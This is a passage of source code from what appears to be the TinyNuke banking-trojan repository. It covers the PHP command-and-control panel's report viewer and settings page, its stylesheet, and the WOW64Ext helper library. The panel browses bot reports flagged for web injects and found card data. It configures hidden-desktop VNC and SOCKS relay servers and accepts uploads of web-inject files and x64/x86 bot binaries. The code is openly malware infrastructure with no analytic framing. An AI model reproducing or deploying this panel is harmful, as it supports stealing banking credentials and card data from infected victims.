'); 108 | else 109 | { 110 | $sqlWhere = ''; 111 | if($_GET['uhids'] != '') 112 | { 113 | $uhids = explode(' ', $_GET['uhids']); 114 | $sqlWhere .= ' AND uhid IN ('.gen_qmarks($uhids).')'; 115 | } 116 | if($_GET['url'] != '') 117 | $sqlWhere .= ' AND url LIKE ?'; 118 | if($_GET['content'] != '') 119 | $sqlWhere .= ' AND content LIKE ?'; 120 | if(isset($_GET['inject'])) 121 | $sqlWhere .= ' AND inject = 1'; 122 | if(isset($_GET['card'])) 123 | $sqlWhere .= ' AND foundCard = 1'; 124 | 125 | $sqlWhere .= ' AND (received >= ? AND received <= ?)'; 126 | 127 | function bind_values() 128 | { 129 | global $query, $uhids, $i; 130 | if($_GET['uhids'] != '') 131 | { 132 | foreach($uhids as $uhid) 133 | $query->bindValue(++$i, $uhid, PDO::PARAM_STR); 134 | } 135 | if($_GET['url'] != '') 136 | $query->bindValue(++$i, $_GET['url'], PDO::PARAM_STR); 137 | if($_GET['content'] != '') 138 | $query->bindValue(++$i, $_GET['content'], PDO::PARAM_STR); 139 | 140 | $query->bindValue(++$i, $_GET['date_min'], PDO::PARAM_INT); 141 | $query->bindValue(++$i, $_GET['date_max'], PDO::PARAM_INT); 142 | } 143 | 144 | $query = $db->prepare('SELECT COUNT(*) FROM reports WHERE 1 = 1'.$sqlWhere); 145 | $i = 0; 146 | bind_values(); 147 | $query->execute(); 148 | $total = $query->fetchColumn(); 149 | if($total == 0) 150 | echo('
No reports found
'); 151 | else 152 | { 153 | get_pag_vars($total, $pages, $page, $offset); 154 | $query = $db->prepare('SELECT * FROM reports WHERE 1 = 1'.$sqlWhere.' 155 | ORDER BY received '.($_GET['dir'] == 1 ? 'ASC' : 'DESC').' LIMIT ? OFFSET ?'); 156 | $i = 0; 157 | bind_values(); 158 | $query->bindValue(++$i, $CONST_PAGE_LIMIT, PDO::PARAM_INT); 159 | $query->bindValue(++$i, $offset, PDO::PARAM_INT); 160 | $query->execute(); 161 | ?> 162 |
163 |
Reports
164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | fetchAll(); 173 | foreach($rows as $row) 174 | { 175 | $url = htmlspecialchars(substr($row['url'], 0, 70)); 176 | if(strlen($url) < strlen($row['url'])) 177 | $url = ''; 178 | echo(' 179 | 180 | 181 | 182 | 183 | 192 | '); 193 | } 194 | ?> 195 |
URLBrowserUHIDReceived
'.$url.''.htmlspecialchars($row['software']).''.htmlspecialchars($row['uhid']).' 184 | 185 | View Content 186 | 187 | 189 | Bot Info 190 | 191 |
196 | 199 |
200 | -------------------------------------------------------------------------------- /panel/settings.php: -------------------------------------------------------------------------------- 1 | Settings updated'); 16 | } 17 | 18 | function write_settings() 19 | { 20 | global 21 | $CONF_TIMEOUT_OFFLINE, 22 | $CONF_TIMEOUT_DEAD, 23 | $CONF_DB_HOST, 24 | $CONF_DB_NAME, 25 | $CONF_DB_USER, 26 | $CONF_DB_PASS, 27 | $CONF_SERVER_HIDDEN_DESKTOP, 28 | $CONF_SERVER_SOCKS, 29 | $CONF_PANEL_USER, 30 | $CONF_PANEL_PASS; 31 | file_put_contents 32 | ( 33 | 'settings_data.php', 34 | '' 46 | ); 47 | echo_settings_updated_info(); 48 | } 49 | 50 | if(isset($_POST['timeout_offline'])) 51 | { 52 | action_sec_check(); 53 | if(!ctype_digit($_POST['timeout_offline']) || !ctype_digit($_POST['timeout_dead'])) 54 | echo('
Invalid timeout value
'); 55 | else 56 | { 57 | $CONF_TIMEOUT_OFFLINE = $_POST['timeout_offline']; 58 | $CONF_TIMEOUT_DEAD = $_POST['timeout_dead']; 59 | write_settings(); 60 | } 61 | } 62 | else if(isset($_POST['db_name'])) 63 | { 64 | action_sec_check(); 65 | $CONF_DB_HOST = $_POST['db_host']; 66 | $CONF_DB_NAME = $_POST['db_name']; 67 | $CONF_DB_USER = $_POST['db_user']; 68 | $CONF_DB_PASS = $_POST['db_pass']; 69 | write_settings(); 70 | } 71 | else if(isset($_POST['server_hidden_desktop'])) 72 | { 73 | action_sec_check(); 74 | $CONF_SERVER_HIDDEN_DESKTOP = $_POST['server_hidden_desktop']; 75 | $CONF_SERVER_SOCKS = $_POST['server_socks']; 76 | write_settings(); 77 | } 78 | else if(isset($_POST['pass'])) 79 | { 80 | action_sec_check(); 81 | if($_POST['pass'] === $_POST['pass2']) 82 | { 83 | $minChars = 4; 84 | if(strlen($_POST['pass']) >= $minChars && strlen($_POST['user']) >= $minChars) 85 | { 86 | $CONF_PANEL_USER = $_POST['user']; 87 | $CONF_PANEL_PASS = hash_pass($_POST['pass']); 88 | write_settings(); 89 | } 90 | else 91 | echo('
User and password must be at least '.$minChars.' characters long
'); 92 | } 93 | else 94 | echo('
Passwords are not the same
'); 95 | } 96 | else if(isset($_FILES['injects_file'])) 97 | { 98 | action_sec_check(); 99 | if($_FILES['injects_file']['error'] != UPLOAD_ERR_OK) 100 | echo_file_upload_error(); 101 | else 102 | { 103 | $json = file_get_contents($_FILES['injects_file']['tmp_name']); 104 | json_decode($json); 105 | if(json_last_error() != JSON_ERROR_NONE) 106 | echo('
Json is invalid
'); 107 | else 108 | { 109 | move_uploaded_file($_FILES['injects_file']['tmp_name'], $CONST_INJECTS_PATH); 110 | echo_settings_updated_info(); 111 | } 112 | } 113 | } 114 | else if(isset($_FILES['x64_bin'])) 115 | { 116 | action_sec_check(); 117 | function is_valid_pe($file) 118 | { 119 | $contents = file_get_contents($file['tmp_name']); 120 | $size = $file['size']; 121 | if($size < 1024) 122 | return false; 123 | if($contents[0] != 'M' || $contents[1] != 'Z') 124 | return false; 125 | return true; 126 | } 127 | if($_FILES['x64_bin']['error'] != UPLOAD_ERR_OK || $_FILES['x86_bin']['error'] != UPLOAD_ERR_OK) 128 | echo_file_upload_error(); 129 | else if(is_valid_pe($_FILES['x64_bin']) && is_valid_pe($_FILES['x86_bin'])) 130 | { 131 | move_uploaded_file($_FILES['x64_bin']['tmp_name'], $CONST_X64_BIN_PATH); 132 | move_uploaded_file($_FILES['x86_bin']['tmp_name'], $CONST_X86_BIN_PATH); 133 | echo_settings_updated_info(); 134 | } 135 | else 136 | echo('
Invalid PE file
'); 137 | } 138 | ?> 139 | 164 |
165 |
166 |
Update Timeouts (Seconds)
167 | 168 | 169 | 170 | 171 | 172 |
Offline
Dead
173 |
174 |
175 |
Update Database Credentials
176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 |
Host
Name
User
Password
184 |
185 |
186 |
Update Server Addresses
187 | 188 | 189 | 190 | 191 | 192 |
VNC
SOCKS
193 |
194 |
195 |
196 |
197 |
Update Panel Credentials
198 | 199 | 200 | 201 | 202 | 203 | 204 |
User
Password
Password Verification
205 |
206 |
207 |
Upload WebInjects
208 | 209 | 210 | 211 | 212 |
FileView Current WebInjects
213 |
214 |
215 |
Upload Binaries
216 | 217 | 218 | 219 | 220 | 221 |
x64
x86
222 |
223 |
224 | -------------------------------------------------------------------------------- /panel/settings_data.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/style/style.css: -------------------------------------------------------------------------------- 1 | body 2 | { 3 | font-size: 12px; 4 | font-family: Verdana, Geneva, sans-serif; 5 | background: #FFF; 6 | width: 1100px; 7 | margin: auto; 8 | padding-top: 10px; 9 | background: #F2F2F2; 10 | } 11 | 12 | .nav 13 | { 14 | padding: 2px 5px; 15 | } 16 | 17 | .nav a, .btn 18 | { 19 | border: 1px solid #888; 20 | color: #666; 21 | text-decoration: none; 22 | margin-right: -1px; 23 | padding: 2px 20px; 24 | background: #F2F2F2; 25 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 26 | position: relative; 27 | border-radius: 2px; 28 | } 29 | 30 | .btn 31 | { 32 | color: #000; 33 | } 34 | 35 | .nav a 36 | { 37 | border-bottom-left-radius: 0px; 38 | border-bottom-right-radius: 0px; 39 | padding: 2px 20px; 40 | } 41 | 42 | .nav a:hover, .btn:hover 43 | { 44 | background-image: linear-gradient(to bottom, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 45 | } 46 | 47 | .nav a.current 48 | { 49 | background: #F7F7F7; 50 | border-bottom: 1px solid #F7F7F7; 51 | padding-top: 4px; 52 | box-shadow: 5px 0 5px -5px #AAA, -5px 0 5px -5px #AAA; 53 | z-index: 1; 54 | color: #000; 55 | } 56 | 57 | .nav a.current:first-child 58 | { 59 | box-shadow: 5px 0 5px -5px #AAA; 60 | } 61 | 62 | .nav a.current:last-child 63 | { 64 | box-shadow: -5px 0 5px -5px #AAA; 65 | } 66 | 67 | .content 68 | { 69 | border: 1px solid #888; 70 | padding: 10px; 71 | background: #F7F7F7; 72 | } 73 | 74 | .input 75 | { 76 | padding: 2px; 77 | border: 1px solid #888; 78 | border-radius: 2px; 79 | -ms-box-sizing: content-box; 80 | -moz-box-sizing: content-box; 81 | -webkit-box-sizing: content-box; 82 | box-sizing: content-box; 83 | } 84 | 85 | form table td:first-child 86 | { 87 | padding-right: 10px; 88 | width: 1%; 89 | } 90 | 91 | .box 92 | { 93 | border: 1px solid #888; 94 | padding: 10px; 95 | background: #F2F2F2; 96 | border-radius: 2px; 97 | } 98 | 99 | .box div:first-child 100 | { 101 | font-style: italic; 102 | border-bottom: 1px solid #AAA; 103 | margin: -10px; 104 | margin-bottom: 10px; 105 | padding: 5px; 106 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 107 | } 108 | 109 | .box div:first-child:before, 110 | .box div:first-child:after 111 | { 112 | content: '~'; 113 | color: #AAA; 114 | padding-right: 5px; 115 | padding-left: 5px; 116 | } 117 | 118 | .margin-bottom 119 | { 120 | margin-bottom: 10px; 121 | } 122 | 123 | .margin-top 124 | { 125 | margin-top: 10px; 126 | } 127 | 128 | .info, .error 129 | { 130 | padding: 5px 0px; 131 | border: 1px solid; 132 | text-align: center; 133 | font-size: 12px; 134 | } 135 | 136 | .info 137 | { 138 | color: #00529B; 139 | background: #f2f2ff; 140 | } 141 | 142 | .error 143 | { 144 | color: #D8000C; 145 | background: #ffe5e5; 146 | } 147 | 148 | .box .input 149 | { 150 | width: 100%; 151 | } 152 | 153 | .table 154 | { 155 | border-collapse: collapse; 156 | width: 100%; 157 | } 158 | 159 | .table td, .table th 160 | { 161 | border: 1px solid #AAA; 162 | padding: 5px; 163 | } 164 | 165 | .table th 166 | { 167 | font-style: italic; 168 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 169 | font-weight: normal; 170 | border: 1px solid #888; 171 | } 172 | 173 | .table tr:nth-child(even) 174 | { 175 | background: #F7F7F7; 176 | } 177 | 178 | .table tr:nth-child(odd) 179 | { 180 | background: #F2F2F2; 181 | } 182 | 183 | .disabled 184 | { 185 | pointer-events: none; 186 | cursor: default; 187 | opacity: 0.6; 188 | } 189 | 190 | .footer 191 | { 192 | text-align: center; 193 | padding: 5px 0px; 194 | border: 1px solid #888; 195 | border-top: 0px; 196 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F2F2F2 100%); 197 | color: #666; 198 | } -------------------------------------------------------------------------------- /wow64ext/CMemPtr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * WOW64Ext Library 4 | * 5 | * Copyright (c) 2014 ReWolf 6 | * http://blog.rewolf.pl/ 7 | * 8 | * This program is free software: you can redistribute it and/or modify 9 | * it under the terms of the GNU Lesser General Public License as published 10 | * by the Free Software Foundation, either version 3 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU Lesser General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU Lesser General Public License 19 | * along with this program. If not, see . 20 | * 21 | */ 22 | #pragma once 23 | 24 | class CMemPtr 25 | { 26 | private: 27 | void** m_ptr; 28 | bool watchActive; 29 | 30 | public: 31 | CMemPtr(void** ptr) : m_ptr(ptr), watchActive(true) {} 32 | 33 | ~CMemPtr() 34 | { 35 | if (*m_ptr && watchActive) 36 | { 37 | free(*m_ptr); 38 | *m_ptr = 0; 39 | } 40 | } 41 | 42 | void disableWatch() { watchActive = false; } 43 | }; 44 | 45 | #define WATCH(ptr) \ 46 | CMemPtr watch_##ptr((void**)&ptr) 47 | 48 | #define DISABLE_WATCH(ptr) \ 49 | watch_##ptr.disableWatch() 50 | -------------------------------------------------------------------------------- /wow64ext/internal.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * WOW64Ext Library 4 | * 5 | * Copyright (c) 2014 ReWolf 6 | * http://blog.rewolf.pl/ 7 | * 8 | * This program is free software: you can redistribute it and/or modify 9 | * it under the terms of the GNU Lesser General Public License as published 10 | * by the Free Software Foundation, either version 3 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU Lesser General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU Lesser General Public License 19 | * along with this program. If not, see . 20 | * 21 | */ 22 | #pragma once 23 | 24 | #define EMIT(a) __asm __emit (a) 25 | 26 | #define X64_Start_with_CS(_cs) \ 27 | { \ 28 | EMIT(0x6A) EMIT(_cs) /* push _cs */ \ 29 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \ 30 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(5) /* add dword [esp], 5 */ \ 31 | EMIT(0xCB) /* retf */ \ 32 | } 33 | 34 | #define X64_End_with_CS(_cs) \ 35 | { \ 36 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \ 37 | EMIT(0xC7) EMIT(0x44) EMIT(0x24) EMIT(4) EMIT(_cs) EMIT(0) EMIT(0) EMIT(0) /* mov dword [rsp + 4], _cs */ \ 38 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(0xD) /* add dword [rsp], 0xD */ \ 39 | EMIT(0xCB) /* retf */ \ 40 | } 41 | 42 | #define X64_Start() X64_Start_with_CS(0x33) 43 | #define X64_End() X64_End_with_CS(0x23) 44 | 45 | #define _RAX 0 46 | #define _RCX 1 47 | #define _RDX 2 48 | #define _RBX 3 49 | #define _RSP 4 50 | #define _RBP 5 51 | #define _RSI 6 52 | #define _RDI 7 53 | #define _R8 8 54 | #define _R9 9 55 | #define _R10 10 56 | #define _R11 11 57 | #define _R12 12 58 | #define _R13 13 59 | #define _R14 14 60 | #define _R15 15 61 | 62 | #define X64_Push(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x50 | ((r) & 7)) 63 | #define X64_Pop(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x58 | ((r) & 7)) 64 | 65 | #define REX_W EMIT(0x48) __asm 66 | 67 | //to fool M$ inline asm compiler I'm using 2 DWORDs instead of DWORD64 68 | //use of DWORD64 will generate wrong 'pop word ptr[]' and it will break stack 69 | union reg64 70 | { 71 | DWORD64 v; 72 | DWORD dw[2]; 73 | }; 74 | -------------------------------------------------------------------------------- /wow64ext/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by wow64ext.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /wow64ext/wow64ext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/wow64ext/wow64ext.dll -------------------------------------------------------------------------------- /wow64ext/wow64ext.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/wow64ext/wow64ext.lib --------------------------------------------------------------------------------